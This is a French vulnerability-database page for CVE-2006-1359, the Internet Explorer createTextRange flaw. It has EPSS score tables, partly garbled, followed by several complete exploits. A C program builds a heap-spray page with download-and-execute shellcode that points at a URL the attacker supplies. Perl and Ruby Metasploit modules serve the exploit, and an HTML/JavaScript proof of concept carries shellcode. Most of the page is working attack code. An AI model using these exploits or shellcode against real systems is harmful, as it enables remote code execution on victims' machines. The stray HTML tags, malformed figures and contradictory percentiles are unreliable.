CVE-2006-1359 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	88.18%	–	–
2022-05-29	–	–	90.78%	–	–
2023-03-12	–	–	–	97.36%	–
2023-04-16	–	–	–	97.22%	–
2023-05-21	–	–	–	97.02%	–
2023-07-02	–	–	–	97.2%	–
2023-08-20	–	–	–	97.21%	–
2023-10-08	–	–	–	97.33%	–
2023-11-26	–	–	–	97.27%	–
2024-02-11	–	–	–	97.33%	–
2024-06-02	–	–	–	97.33%	–
2024-07-14	–	–	–	97.37%	–
2024-12-22	–	–	–	97.3%	–
2025-03-02	–	–	–	97.22%	–
2025-01-19	–	–	–	97.3%	–
2025-03-09	–	–	–	97.22%	–
2025-03-18	–	–	–	–	86.97%
2025-03-30	–	–	–	–	87.6%
2025-03-30	–	–	–	–	87.6,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	1%
2022-05-29	1%
2023-03-12	1%
2023-04-16	1%
2023-05-21	1%
2023-07-02	1%
2023-08-20	1%
2023-10-08	1%
2023-11-26	1%
2024-02-11	1%
2024-06-02	1%
2024-07-14	1%
2024-12-22	1%
2025-03-02	1%
2025-01-19	1%
2025-03-09	1%
2025-03-18	99%
2025-03-30	99%
2025-03-30	99%

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <fieldset> <h4> <pre><td> <menu> <legend> <a> <ul> <small> <fieldset> <h6> </h6 ></u> </optgroup> </tr> </map> </ul ></dfn> </del> </h2> </dir> </ul> # milw0rm.com [2006-05-27]

/* * * Internet Explorer "createTextRang" Download Shellcoded Exploit (2) * Bug discovered by Computer Terrorism (UK) * http://www.computerterrorism.com/research/ct22-03-2006 * * Affected Software: Microsoft Internet Explorer 6.x & 7 Beta 2 * Severity: Critical * Impact: Remote System Access * Solution Status: Unpatched * * E-Mail: atmaca@icqmail.com * Web: http://www.spyinstructors.com,http://www.atmacasoft.com * Credit to Kozan,SkyLined,delikon,Darkeagle,Stelian Ene * */ /* * * This one is more faster than all released createTextRange exploits * because it uses last version of SkyLined's heap spraying code, * special 10x goes to him. * */ #include <windows.h> #include <stdio.h> #define BUF_LEN 0x800 #define FILE_NAME "index.htm" char body1[] = "<input type=\"checkbox\" id=\"blah\">\r\n" "<SCRIPT language=\"javascript\">\r\n\r\n" "\tvar heapSprayToAddress = 0x3c0974c2;\r\n\r\n" "\tvar payLoadCode = unescape(\"%u9090%u9090%u9090\" +\r\n" "\t\"%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC\" +\r\n" "\t\"%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0\" +\r\n" "\t\"%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877\" +\r\n" "\t\"%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0\" +\r\n" "\t\"%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456\" +\r\n" "\t\"%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D\" +\r\n" "\t\"%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A\" +\r\n" "\t\"%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC\" +\r\n" "\t\"%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124\" +\r\n" "\t\"%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000\" +\r\n" "\t\"%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u686D%u2E68%u7865\" +\r\n" "\t\"%u0065"; char body2[] = "\r\n\r\n\tvar heapBlockSize = 0x400000;\r\n\r\n" "\tvar payLoadSize = payLoadCode.length * 2;\r\n\r\n" "\tvar spraySlideSize = heapBlockSize - (payLoadSize+0x38);\r\n\r\n" "\tvar spraySlide = unescape(\"%u9090%u9090\");\r\n" "\tspraySlide = getSpraySlide(spraySlide,spraySlideSize);\r\n\r\n" "\theapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;\r\n\r\n" "\tmemory = new Array();\r\n\r\n" "\tfor (i=0;i<heapBlocks;i++)\r\n" "\t{\r\n\t\tmemory[i] = spraySlide + payLoadCode;\r\n\t}\r\n\r\n" "\tvar r = document.getElementById('blah').createTextRange();\r\n\r\n" "\tfunction getSpraySlide(spraySlide, spraySlideSize)\r\n" "\t{\r\n\t\twhile (spraySlide.length*2<spraySlideSize)\r\n\t\t{\r\n" "\t\t\tspraySlide += spraySlide;\r\n\t\t}\r\n" "\t\tspraySlide = spraySlide.substring(0,spraySlideSize/2);\r\n" "\t\treturn spraySlide;\r\n" "\t}\r\n\r\n</script>"; int main(int argc,char *argv[]) { if (argc < 2) { printf("\nInternet Explorer \"createTextRang\" Download Shellcoded Exploit (2)"); printf("\nCoded by ATmaCA (atmaca[at]icqmail.com)\n"); printf("\nUsage:\n"); printf("ie_exp <WebUrl>\n"); return 0; } FILE *File; char *pszBuffer; char *web = argv[1]; char *pu = "%u"; char u_t[5]; char *utf16 = (char*)malloc(strlen(web)*5); if ( (File = fopen(FILE_NAME,"w+b")) == NULL ) { printf("\n [Err:] fopen()"); exit(1); } pszBuffer = (char*)malloc(BUF_LEN); memcpy(pszBuffer,body1,sizeof(body1)-1); memset(utf16,'\0',strlen(web)*5); for (unsigned int i=0;i<strlen(web);i=i+2) { sprintf(u_t,"%s%.2x%.2x", pu, web[i+1], web[i]); strcat(utf16,u_t); } strcat(pszBuffer,utf16); strcat(pszBuffer,"%u0000\");"); strcat(pszBuffer,body2); fwrite(pszBuffer, BUF_LEN, 1,File); fclose(File); printf("\n\n" FILE_NAME " has been created in the current directory.\n"); return 1; } // milw0rm.com [2006-03-31]

## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::ie_createtextrange; use strict; use base "Msf::Exploit"; use Pex::Text; use IO::Socket::INET; use IPC::Open3; my $advanced = { 'Gzip' => [1, 'Enable gzip content encoding'], 'Chunked' => [1, 'Enable chunked transfer encoding'], }; my $info = { 'Name' => 'Internet Explorer createTextRange() Code Execution', 'Version' => '$Revision: 1.4 $', 'Authors' => [ 'Faithless <rhyskidd [at] gmail.com>', 'Darkeagle <unl0ck.net>', 'H D Moore <hdm [at] metasploit.com>', '<justfriends4n0w [at] yahoo.com>', 'Anonymous', ], 'Description' => Pex::Text::Freeform(qq{ This module exploits a code execution vulnerability in Microsoft Internet Explorer. Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point to a very remote, non-existent memory location. This module is the result of merging three different exploit submissions and has only been reliably tested against Windows XP SP2. This vulnerability was independently discovered by multiple parties. The heap spray method used by this exploit was pioneered by Skylined. }), 'Arch' => [ 'x86' ], 'OS' => [ 'win32', 'winxp', 'win2003' ], 'Priv' => 0, 'UserOpts' => { 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", 'Keys' => ['-bind'], }, 'Refs' => [ ['OSVDB', '24050'], ['BID', '17196'], ['CVE', '2006-1359'], ['URL', 'http://secunia.com/secunia_research/2006-7/advisory/'], ['URL', 'http://seclists.org/lists/bugtraq/2006/Mar/0410.html'], ['URL', 'http://www.kb.cert.org/vuls/id/876678'], ['URL', 'http://seclists.org/lists/fulldisclosure/2006/Mar/1439.html'], ['URL', 'http://www.shog9.com/crashIE.html'], ], 'DefaultTarget' => 0, 'Targets' => [ [ 'Internet Explorer 7 - (7.0.5229.0) -> 3C0474C2 (Windows XP SP2)' ], [ 'Internet Explorer 6 - (6.0.3790.0) -> 746F9468 (Windows XP SP2)' ], ], 'Keys' => [ 'ie' ], 'DisclosureDate' => 'Mar 19 2006', }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; if (! $self->InitNops(128)) { $self->PrintLine("[*] Failed to initialize the NOP module."); return; } my $server = IO::Socket::INET->new( LocalHost => $self->GetVar('HTTPHOST'), LocalPort => $self->GetVar('HTTPPORT'), ReuseAddr => 1, Listen => 1, Proto => 'tcp' ); my $client; # Did the listener create fail? if (not defined($server)) { $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); return; } my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ? Pex::Utils::SourceIP('1.2.3.4') : $self->GetVar('HTTPHOST'); $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/"); while (defined($client = $server->accept())) { $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client)); } return; } sub HandleHttpClient { my $self = shift; my $fd = shift; # Set the remote host information my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); # Read the HTTP command my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3); my $agent; # Read in the HTTP headers while ((my $line = $fd->RecvLine(10))) { $line =~ s/^\s+|\s+$//g; my ($var, $val) = split(/\:/, $line, 2); # Break out if we reach the end of the headers last if (not defined($var) or not defined($val)); $agent = $val if $var =~ /User-Agent/i; } my $os = 'Unknown'; $os = 'Linux' if $agent =~ /Linux/i; $os = 'Mac OS X' if $agent =~ /OS X/i; $os = 'Windows' if $agent =~ /Windows/i; $self->PrintLine("[*] Client connected from $rhost:$rport ($os)."); my $res = $fd->Send($self->BuildResponse($self->GenerateHTML())); $fd->Close(); } sub JSUnescape { my $self = shift; my $data = shift; my $code = ''; # Encode the shellcode via %u sequences for JS's unescape() function my $idx = 0; while ($idx < length($data) - 1) { my $c1 = ord(substr($data, $idx, 1)); my $c2 = ord(substr($data, $idx+1, 1)); $code .= sprintf('%%u%.2x%.2x', $c2, $c1); $idx += 2; } return $code; } sub GenerateHTML { my $self = shift; my $target = $self->Targets->[$self->GetVar('TARGET')]; my $shellcode = $self->JSUnescape($self->GetVar('EncodedPayload')->Payload); my $nops = $self->JSUnescape($self->MakeNops(4)); my $rnd = int(rand(3)); my $inputtype = (($rnd == 0) ? "checkbox" : (($rnd == 1) ? "radio" : "image")); my $inp = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); my $tmp = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); my $payload = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); my $nopslide = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); my $slidesize = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); my $fillblock = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); my $memblock = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); my $heap = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); my $index = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); my $maxIndex = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); my $fillHeap = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); my $start = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); my $timer = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); $rnd = int(rand(2)); my $setTimeout =($rnd == 0) ? "setTimeout('$fillHeap()', 5);" : ""; my $setInterval =($rnd == 1) ? "setInterval('$fillHeap()', 5);" : ""; my $data = qq# <html> <head> <script language="javascript"> var $payload=unescape("$shellcode"); var $nopslide=unescape("$nops"); var $slidesize=20+$payload.length; while ($nopslide.length<$slidesize) { $nopslide+=$nopslide; } var $fillblock=$nopslide.substring(0,$slidesize); var $memblock=$nopslide.substring(0,$nopslide.length-$slidesize); while($memblock.length+$slidesize<0x40000) { $memblock+=$fillblock; } var $heap=new Array(); var $index=0; var $maxIndex=2020; function $fillHeap() { $timer.innerHTML=Math.round(($index/$maxIndex)*100); if ($index<$maxIndex) { $heap.push($memblock+$payload); $index++; $setTimeout } else { $timer.innerHTML=100; $inp=document.createElement("input"); $inp.type="$inputtype"; $tmp=$inp.createTextRange(); } } function $start() { $setTimeout$setInterval } </script> </head> <body onload="$start()"> Sit back and relax as your windows box is being exploited using a non CPU consuming heap spraying exploit.<BR /> In the meantime, you can open your task manager and watch how the VM size of IEXPLORE.EXE grows, while the CPU time of this process is very low.<BR /> Progress: <span id="$timer"></span>% </body> </html> #; } sub BuildResponse { my ($self, $content) = @_; my $response = "HTTP/1.1 200 OK\r\n" . "Content-Type: text/html\r\n"; if ($self->GetVar('Gzip')) { $response .= "Content-Encoding: gzip\r\n"; $content = $self->Gzip($content); } if ($self->GetVar('Chunked')) { $response .= "Transfer-Encoding: chunked\r\n"; $content = $self->Chunk($content); } else { $response .= 'Content-Length: ' . length($content) . "\r\n" . "Connection: close\r\n"; } $response .= "\r\n" . $content; return $response; } sub Chunk { my ($self, $content) = @_; my $chunked; while (length($content)) { my $chunk = substr($content, 0, int(rand(10) + 1), ''); $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n"; } $chunked .= "0\r\n\r\n"; return $chunked; } sub Gzip { my $self = shift; my $data = shift; my $comp = int(rand(5))+5; my($wtr, $rdr, $err); my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force'); print $wtr $data; close ($wtr); local $/; return (<$rdr>); } 1; # milw0rm.com [2006-04-01]

<!-- -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ /\ \/ Internet Explorer Remote Code Execution Exploit v 0.1 /\ by Darkeagle of Unl0ck Research Team \/ /\ used SkyLined idea of exploitation. special tnx goes to him. \/ Affected Software : Microsoft Internet Explorer 6.x, IE7 Beta 2 Severity : Critical Impact : Remote System Access Solution Status : ** UNPATCHED ** Discovered by : Computer Terrorism (UK) Advisory Date : 22nd March, 2006 Tested : WinXP SP2 RUS IE 6.0 (full patched) Vulnerability details: PoC from CyberTerrorists crashes IE and overwrites EIP. EIP points to unknown place. In my case it points to 0x3c0474c2. Exploit fills heap with "nops+shellcode" 'til 0x3CxxXXxx. Then IE trys to read memory @ 0x3c0474c2. At this time 0x3c0474c2 contains nops+shellcode. In the end IE executes shellcode. Exploit needs more RAM. Tested under 192mb RAM with 800mb of maximum page cache. Under 512mb code was executed after 1-1.5 minutes. Successfull exploitation will execute standart windows calculator. Greets: Unl0ck Researchers, 0x557 guys, ph4nt0m guys, sh0k, uf0, BlackSecurity guys, many otherz. /\ http://unl0ck.net \/ /\ (c) 2004 - 2006 \/ -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ --> <input type="checkbox" id="blah"> <SCRIPT language="javascript"> shellcode = unescape( "%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" + "%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" + "%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" + "%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" + "%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" + "%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" + "%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" + "%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" + "%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" + "%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" + "%uCC4A%uD0FF"); bigblock = unescape("%u9090%u9090"); slackspace = 20 + shellcode.length while (bigblock.length < slackspace) bigblock += bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length + slackspace < 0x40000) block = block + block + fillblock; memory = new Array(); for ( i = 0; i < 2020; i++ ) memory[i] = block + shellcode; var r = document.getElementById('blah').createTextRange(); </script> # milw0rm.com [2006-03-23]

## # $Id: ms06_013_createtextrange.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Internet Explorer createTextRange() Code Execution', 'Description' => %q{ This module exploits a code execution vulnerability in Microsoft Internet Explorer. Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point to a very remote, non-existent memory location. This module is the result of merging three different exploit submissions and has only been reliably tested against Windows XP SP2. This vulnerability was independently discovered by multiple parties. The heap spray method used by this exploit was pioneered by Skylined. }, 'License' => MSF_LICENSE, 'Author' => [ 'Faithless <rhyskidd [at] gmail.com>', 'Darkeagle <unl0ck.net>', 'hdm', '<justfriends4n0w [at] yahoo.com>', 'anonymous', ], 'Version' => '$Revision: 10394 $', 'References' => [ ['CVE', '2006-1359'], ['OSVDB', '24050'], ['MSB', 'MS06-013'], ['BID', '17196'], ['US-CERT-VU', '876678'], ['URL', 'http://secunia.com/secunia_research/2006-7/advisory/'], ['URL', 'http://seclists.org/lists/bugtraq/2006/Mar/0410.html'], ['URL', 'http://seclists.org/lists/fulldisclosure/2006/Mar/1439.html'], ['URL', 'http://www.shog9.com/crashIE.html'], ], 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ [ 'Internet Explorer 6 - (6.0.3790.0 - Windows XP SP2)', { 'Ret' => 0x746F9468 } ], [ 'Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2)', { 'Ret' => 0x3C0474C2 } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 19 2006')) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Encode the shellcode shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Create some nops nops = Rex::Text.to_unescape(make_nops(4)) # Generate a random XML namespace for VML xmlns = rand_text_alpha(rand(30)+2) # Randomize the javascript variable names rnd = rand(3) var_inputtype = ((rnd == 0) ? "checkbox" : ((rnd == 1) ? "radio" : "image")) var_inp = "_"+rand_text_alpha(rand(6)+3) var_tmp = "_"+rand_text_alpha(rand(6)+3) var_payload = "_"+rand_text_alpha(rand(6)+3) var_nopslide = "_"+rand_text_alpha(rand(6)+3) var_slidesize = "_"+rand_text_alpha(rand(6)+3) var_fillblock = "_"+rand_text_alpha(rand(6)+3) var_memblock = "_"+rand_text_alpha(rand(6)+3) var_heap = "_"+rand_text_alpha(rand(6)+3) var_index = "_"+rand_text_alpha(rand(6)+3) var_maxIndex = "_"+rand_text_alpha(rand(6)+3) var_fillHeap = "_"+rand_text_alpha(rand(6)+3) var_start = "_"+rand_text_alpha(rand(6)+3) var_timer = "_"+rand_text_alpha(rand(6)+3) rnd = rand(2) var_setTimeout = (rnd == 0) ? "setTimeout('#{var_fillHeap}()', 5)" : "" var_setInterval = (rnd == 1) ? "setInterval('#{var_fillHeap}()', 5)" : "" # Build out the message content = %Q|<html> <head> <script language = "javascript"> var #{var_payload} = unescaape("#{shellcode}"); var #{var_nopslide} = unescape("#{nops}"); var #{var_slidesize} = 20+#{var_payload}.length; while (#{var_nopslide}.length<#{var_slidesize}) { #{var_nopslide} += #{var_nopslide}; } var #{var_fillblock} = #{var_nopslide}.substring(0,#{var_slidesize}); var #{var_memblock} = #{var_nopslide}.substring(0,#{var_nopslide}.length-#{var_slidesize}); while(#{var_memblock}.length+#{var_slidesize} < 0x40000) { #{var_memblock} += #{var_fillblock}; } var #{var_heap} = new Array(); var #{var_index} = 0; var #{var_maxIndex} = 2020; function #{var_fillHeap}() { #{var_timer}.innerHTML = Math.round((#{var_index}/#{var_maxIndex})*100); if (#{var_index}<#{var_maxIndex}) { #{var_heap}.push(#{var_memblock}+#{var_payload}); #{var_index}++; #{var_setTimeout} } else { #{var_timer}.innerHTML = 100; #{var_inp} = document.createElement("input"); #{var_inp}.type = "#{var_inputtype}"; #{var_tmp} = #{var_inp}.createTextRange(); } } function #{var_start}() { #{var_setTimeout}#{var_setInterval} } </script> </head> <body onload="#{var_start}()"> <span id="#{var_timer}"> % </span> </body> </html> | content = Rex::Text.randomize_space(content) print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) # Handle the payload handler(cli) end end